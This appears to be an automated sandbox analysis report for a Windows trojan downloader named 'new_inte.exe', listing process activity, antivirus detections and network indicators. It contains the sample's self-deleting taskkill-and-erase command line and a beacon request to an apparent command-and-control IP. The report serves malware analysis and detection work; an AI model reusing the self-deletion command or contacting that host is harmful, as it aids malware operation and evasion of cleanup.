Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Jan. 14, 2024, 1:33 p.m. | Jan. 14, 2024, 1:39 p.m. |
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "new_inte.exe" /f & erase "C:\Users\test22\AppData\Local\Temp\new_inte.exe" & exit
2684-
taskkill.exe taskkill /im "new_inte.exe" /f
2756
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
185.172.128.90 | Active | Moloch |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
suspicious_features | Connection to IP address | suspicious_request | GET http://185.172.128.90/cpa/ping.php?substr=one&s=two |
request | GET http://185.172.128.90/cpa/ping.php?substr=one&s=two |
cmdline | "C:\Windows\System32\cmd.exe" /c taskkill /im "new_inte.exe" /f & erase "C:\Users\test22\AppData\Local\Temp\new_inte.exe" & exit |
cmdline | C:\Windows\System32\cmd.exe /c taskkill /im "new_inte.exe" /f & erase "C:\Users\test22\AppData\Local\Temp\new_inte.exe" & exit |
file | C:\Users\test22\AppData\Local\Temp\new_inte.exe |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "new_inte.exe") |
cmdline | "C:\Windows\System32\cmd.exe" /c taskkill /im "new_inte.exe" /f & erase "C:\Users\test22\AppData\Local\Temp\new_inte.exe" & exit |
cmdline | taskkill /im "new_inte.exe" /f |
cmdline | C:\Windows\System32\cmd.exe /c taskkill /im "new_inte.exe" /f & erase "C:\Users\test22\AppData\Local\Temp\new_inte.exe" & exit |
host | 185.172.128.90 |
file | C:\Users\test22\AppData\Local\Temp\new_inte.exe |
Bkav | W32.AIDetectMalware |
Lionic | Trojan.Win32.Tepfer.i!c |
Elastic | malicious (high confidence) |
Cynet | Malicious (score: 100) |
Skyhigh | BehavesLike.Win32.Downloader.ch |
ALYac | Gen:Trojan.Heur.RP.luW@bGPxNopi |
Cylance | unsafe |
VIPRE | Gen:Trojan.Heur.RP.luW@bGPxNopi |
Sangfor | Downloader.Win32.Agent.Vjnh |
BitDefender | Gen:Trojan.Heur.RP.luW@bGPxNopi |
Cybereason | malicious.16d3d8 |
Arcabit | Trojan.Heur.RP.E48F1C |
Symantec | ML.Attribute.HighConfidence |
ESET-NOD32 | a variant of Win32/TrojanDownloader.Agent.ELB |
APEX | Malicious |
McAfee | Artemis!8A6150D9AEEC |
Avast | Win32:DropperX-gen [Drp] |
Kaspersky | VHO:Trojan-PSW.Win32.Tepfer.gen |
Alibaba | TrojanDownloader:Win32/DropperX.e23371e1 |
MicroWorld-eScan | Gen:Trojan.Heur.RP.luW@bGPxNopi |
Rising | Trojan.Generic@AI.100 (RDML:CNtgNH16DDDc1dNCY3OvUQ) |
Emsisoft | Gen:Trojan.Heur.RP.luW@bGPxNopi (B) |
F-Secure | Heuristic.HEUR/AGEN.1317762 |
TrendMicro | TROJ_GEN.R06CC0WAD24 |
Sophos | Mal/Generic-S |
Webroot | W32.Trojan.Gen |
Detected | |
Avira | HEUR/AGEN.1317762 |
Antiy-AVL | Trojan[Downloader]/Win32.Agent |
Kingsoft | malware.kb.a.771 |
Microsoft | Trojan:Win32/Znyonm |
ZoneAlarm | VHO:Trojan-PSW.Win32.Tepfer.gen |
GData | Gen:Trojan.Heur.RP.luW@bGPxNopi |
Varist | W32/Agent.EPA.gen!Eldorado |
BitDefenderTheta | AI:Packer.781F2A261F |
DeepInstinct | MALICIOUS |
VBA32 | BScope.TrojanPSW.Tepfer |
Malwarebytes | Generic.Malware/Suspicious |
Tencent | Win32.Trojan-Downloader.Oader.Osmw |
SentinelOne | Static AI - Suspicious PE |
MaxSecure | Trojan.Malware.300983.susgen |
Fortinet | W32/Agent.ELB!tr.dldr |
AVG | Win32:DropperX-gen [Drp] |
CrowdStrike | win/malicious_confidence_100% (W) |